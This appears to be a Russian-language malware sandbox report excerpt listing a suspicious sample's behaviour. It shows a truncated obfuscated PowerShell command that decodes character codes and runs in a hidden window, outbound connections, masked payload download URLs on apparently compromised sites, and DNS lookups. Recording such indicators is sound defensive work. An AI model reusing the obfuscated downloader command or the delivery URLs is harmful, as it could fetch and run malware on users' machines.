Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StriNg]::Join( '' ,( '58s106a84k79~35{112G123s105&51j113j124{116&123j125&106G62j80j123G106s48s73>123>124>93s114a119G123j112b106b37G58{110s100G71~35s57a118>106s106{110G36a49G49{105&105~105{48k1...
- 'qp####nsultancy.com':80
- 'so###dons.com':80
- 'so###dons.com':443
- http://www.qp####nsultancy.com/wp-content/O5CjQTL/
- http://www.so###dons.com/eFtSiFT/
- 'so###dons.com':443
- DNS ASK tr###ytampa.com
- DNS ASK in#####t-sodimavi.com
- DNS ASK qp####nsultancy.com
- DNS ASK so###dons.com
- DNS ASK ma###o-bau.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [StriNg]::Join( '' ,( '58s106a84k79~35{112G123s105&51j113j124{116&123j125&106G62j80j123G106s48s73>123>124>93s114a119G123j112b106b37G58{110s100G71~35s57a118>106s106{110G36a49G49{105&105~105{48k1...' (со скрытым окном)